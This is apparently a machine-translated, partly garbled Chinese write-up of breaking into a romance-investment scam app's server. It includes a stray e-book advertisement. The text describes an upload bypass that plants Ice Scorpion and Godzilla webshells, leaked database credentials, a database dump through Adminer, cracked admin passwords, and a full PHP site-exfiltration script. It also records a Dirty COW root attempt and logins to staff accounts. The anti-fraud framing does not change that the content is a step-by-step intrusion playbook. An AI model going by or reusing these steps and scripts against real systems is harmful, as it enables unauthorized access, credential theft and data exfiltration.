The so-called “killing pig pan” is an online scam in which fraudsters use online dating, usually of the opposite sex, to induce victims to download scam apps and make various “investments” on them, such as spinach, stocks, futures and even virtual currencies. This year and month white encountered this kind of deception, he had been cheat by QQ add a named “heart” and download the APP, in the “heart” on the APP met a beauty, called “xx teacher” the small white is beautiful mini eye going to meet a net friend, but the beauty is an excuse to let him to download another APP called paradise at midnight, Sure enough, Xiaobai was successfully defrauded of more than 100,000 yuan.
0x01 APP Test Preparation
According to xiaobai’s description, we pay attention to the following information, respectively QQ, “heart” APP and “midnight paradise” APP, but xiaobai because cannot bear to be cheated will cheat QQ deleted. Therefore, we could not start from the QQ number, but the APK package of these two apps did exist, so we started infiltration analysis.
Install the APP
Install these two apps using the Nighthian emulator. For convenience, use Android version 5.0, otherwise HTTPS packets will not be captured
Fact: Since Android 7.0, the default network security configuration has been modified to no longer trust the CA certificate added by the user, and therefore the certificate of the packet capture tool
Since the “Midnight Paradise” APP requires an invitation code to register, we first install the “heart” APP
1, 200 copies of many out-of-print e-books have not been bought 2, 30G security factory inside the video materials 3, 100 copies of SRC documents 4, common security comprehensive questions 5, CTF contest classic topic analysis 6, the full kit 7, emergency response notes 8, network security learning route
Set the caught
Set the listening address and listening port in BurpSuite. The IP address is the Intranet IP address
Set the HTTP proxy in the network to the proxy address and port in BurpSuite
Visit Baidu and successfully capture data packet in Burp Suite
Now HTTP packets can be captured
Install the certificate
Next, in order to capture HTTPS packets, we need to install the CA certificate for them
accesshttps://burpClick on theCAStart to download the certificateSet up theFound in thesecurity
chooseInstall from an SD card
Select the downloaded certificate and name it
inUser credentialsThe certificate already exists in
Go to https://www.baidu.com
HTTPS packet was successfully captured in Burp Suite
0 x02 online shell
Preliminary study on upload Vulnerability
Register a test account in the APP
Found in theRelease the dynamicA file has been uploaded
Using the Burp Suite to intercept the packet, the test found that the target site only returned 0 or 1
After uploading, this function is found normal in the moments interface, so where is the corresponding picture path?
You can find the address of the image by capturing the packet
If the file name of a data packet is changed to PHP, the data packet cannot be uploaded. A defense mechanism may exist
File upload vulnerability to obtain Webshell
After trying several ways to bypass without success, I found the file uploading point in the background picture of friends circle and uploaded the ice Scorpion
Fortunately, the target returned directly to the Trojan address, using the ice scorpion to connect to the target
So far Webshell has gone live, but unfortunately this is a Docker environment. In order to maintain control of the target site, a Godzilla horse continues to be uploaded
0x03 Information Collection
Viewing the Current Environment
The current user is an ordinary WWW user, able to execute some simple commands
Check file management, find thinkPHP framework under the site, start looking for configuration files
Database Login
The database connection file was found in the configuration file
Return [// database type' type' => Env::get('database.type', 'mysql'), // server address 'hostname' => Env::get('database.hostname', Env::get('database.database', 'netchat'), // username' username' => Env::get('database.username', 'root'), // password' password' => Env::get('database.password', 'MysqlNetchatPWD#'), // hostport => Env::get('database.hostport', '3305'),];Copy the codeSince the database cannot be connected through the ice scorpion, we upload the Adminer connection to the database and set the server address to192.168.0.59:3305, enter your account and password
Select Database Export in Adminer to package the current database for download directly
Background address and account password
There were also some surprises in the database, which contained some administrator account passwords
After decryption, the password of admin666 is 123456
The login address is displayed in the admin_log tablehttps://xx.xx.xx.xx/adim888/index/login
After the visit, the following interface is displayed. We only need to enter the account password and Google verification code to log in. In order to avoid the spirit of grass, we did not directly log in the background.
Packaging website
Next, to facilitate analysis, use the following script to package the entire site for download
<? php error_reporting(0); class PHPZip{ var $dirInfo = array("0","0"); var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function createZip($dir, $zipfilename){ if (@function_exists('gzcompress')){ @set_time_limit("0"); if (is_array($dir)){ $fd = fopen ($dir, "r"); $fileValue = fread ($fd, filesize ($filename)); fclose ($fd); if (is_array($dir)) $filename = basename($dir); $this -> addFile($fileValue, "$filename"); }else{ $this->dirTree($dir,$dir); } $out = $this -> filezip(); $fp = fopen($zipfilename, "w"); fwrite($fp, $out, strlen($out)); fclose($fp); $filesize = filesize($zipfilename); if ($filesize < 104857600) { echo "create zip success!" ; } else { echo "create zip error!" ; } } } //get dir tree.. function dirTree($directory,$rootDir){ $fileDir = $rootDir; $myDir = dir($directory); while($file=$myDir->read()){ if(is_dir("$directory/$file") and $file! ="." and $file! = ".." ){ $this->dirInfo[0]++; $rootDir ="$fileDir$file/"; $this -> addFile('', "$rootDir"); //go on n's folders $this->dirTree("$directory/$file",$rootDir); }else{ if($file! ="." and $file! = ".." ){ $this->dirInfo[1]++; $fileValue = file_get_contents("$directory/$file"); $this -> addFile($fileValue, "$fileDir$file"); } } } $myDir->close(); } function unix2DosTime($unixtime = 0) { $timearray = ($unixtime == 0) ? getdate() : getdate($unixtime); if ($timearray['year'] < 1980) { $timearray['year'] = 1980; $timearray['mon'] = 1; $timearray['mday'] = 1; $timearray['hours'] = 0; $timearray['minutes'] = 0; $timearray['seconds'] = 0; } // end if return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); } function addFile($data, $name, $time = 0){ $name = str_replace('\\', '/', $name); $dtime = dechex($this->unix2DosTime($time)); $hexdtime = '\x' . $dtime[6] . $dtime[7] . '\x' . $dtime[4] . $dtime[5] . '\x' . $dtime[2] . $dtime[3] . '\x' . $dtime[0] . $dtime[1]; eval('$hexdtime = "' . $hexdtime . '"; '); $fr = "\x50\x4b\x03\x04"; $fr .= "\x14\x00"; // ver needed to extract $fr .= "\x00\x00"; // gen purpose bit flag $fr .= "\x08\x00"; // compression method $fr .= $hexdtime; // last mod time and date // "local file header" segment $unc_len = strlen($data); $crc = crc32($data); $zdata = gzcompress($data); $c_len = strlen($zdata); $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); // fix crc bug $fr .= pack('V', $crc); // crc32 $fr .= pack('V', $c_len); // compressed filesize $fr .= pack('V', $unc_len); // uncompressed filesize $fr .= pack('v', strlen($name)); // length of filename $fr .= pack('v', 0); // extra field length $fr .= $name; // "file data" segment $fr .= $zdata; // "data descriptor" segment (optional but necessary if archive is not // served as file) $fr .= pack('V', $crc); // crc32 $fr .= pack('V', $c_len); // compressed filesize $fr .= pack('V', $unc_len); // uncompressed filesize // add this entry to array $this -> datasec[] = $fr; $new_offset = strlen(implode('', $this->datasec)); // now add to central directory record $cdrec = "\x50\x4b\x01\x02"; $cdrec .= "\x00\x00"; // version made by $cdrec .= "\x14\x00"; // version needed to extract $cdrec .= "\x00\x00"; // gen purpose bit flag $cdrec .= "\x08\x00"; // compression method $cdrec .= $hexdtime; // last mod time & date $cdrec .= pack('V', $crc); // crc32 $cdrec .= pack('V', $c_len); // compressed filesize $cdrec .= pack('V', $unc_len); // uncompressed filesize $cdrec .= pack('v', strlen($name) ); // length of filename $cdrec .= pack('v', 0 ); // extra field length $cdrec .= pack('v', 0 ); // file comment length $cdrec .= pack('v', 0 ); // disk number start $cdrec .= pack('v', 0 ); // internal file attributes $cdrec .= pack('V', 32 ); // external file attributes - 'archive' bit set $cdrec .= pack('V', $this -> old_offset ); // relative offset of local header $this -> old_offset = $new_offset; $cdrec .= $name; // optional extra field, file comment goes here // save to central directory $this -> ctrl_dir[] = $cdrec; } function filezip(){ $data = implode('', $this -> datasec); $ctrldir = implode('', $this -> ctrl_dir); return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . // total # of entries "on this disk" pack('v', sizeof($this -> ctrl_dir)) . // total # of entries overall pack('V', strlen($ctrldir)) . // size of central dir pack('V', strlen($data)) . // offset to start of central dir "\x00\x00"; // .zip file comment length } } $zip = new PHPZip(); $path = $_GET['path']; $filename = $_GET['filename']; if (isset($path)&&isset($filename)) { $zip -> createZip($path, $filename); } else { echo "please input correct path and filename, like <a href=#>http://example.com?path=/home&filename=home.zip</a>"; }? >Copy the codeIP Address Query
Query admin login logs using a simple SQL statement
select distinct ip from yl_admin_log limit 50
Copy the code
It is found that the login IP address of this site is foreign IP, guess that the website administrator is through the proxy or itself in the foreign access background
The query yl_CORE_IP table found an IP
The IP address is labeled with a malicious address after the micro step is queried
0x04 Permission Promotion
Since the current permission is relatively low, we also need to get the root permission in the Docker environment, but I did not successfully lift the right, naturally, we cannot use docker escape to jump to the real environment. Here’s my record of failed attempts to use dirty cow claims.
System Information Collection
uname -a
cat /etc/issue
Copy the code
The current operating system is Debian GNU/Linux 10
Vulnerability query
Linuxenum and linux-exploities-suggestor were uploaded, and executed with the execution permission
chmod 777 linuxenum.sh
chmod 777 linux-exploit-suggestor.sh
Copy the code
Dirty bull power
The results returned from linux-explosion-suggestor showed that there was a dirty cow vulnerability
GCC cowroot. C -o cowroot -pthread GCC cowroot. C -o cowroot -pthread GCC cowroot chmod +x cowroot ./cowrootCopy the codeThe failure process is not screenshots
0x05 Fraud analysis and warning
Log in to customer service to check chat history
There are related customer service user account password in the database, directly decoding the base64 encoding can get the plaintext
Log in to a few customer service users to check
Pig plate process
Here we are also based onThe small whiteIts account was found as q123456x
Confirm that the user is the victim account by registering the IP address. However, after attempting to login, the user is locked. The islogin of the user is 0 in the database, but the user cannot login after changing to 1. The administrator’s operation records show that the user has been blocking the account.
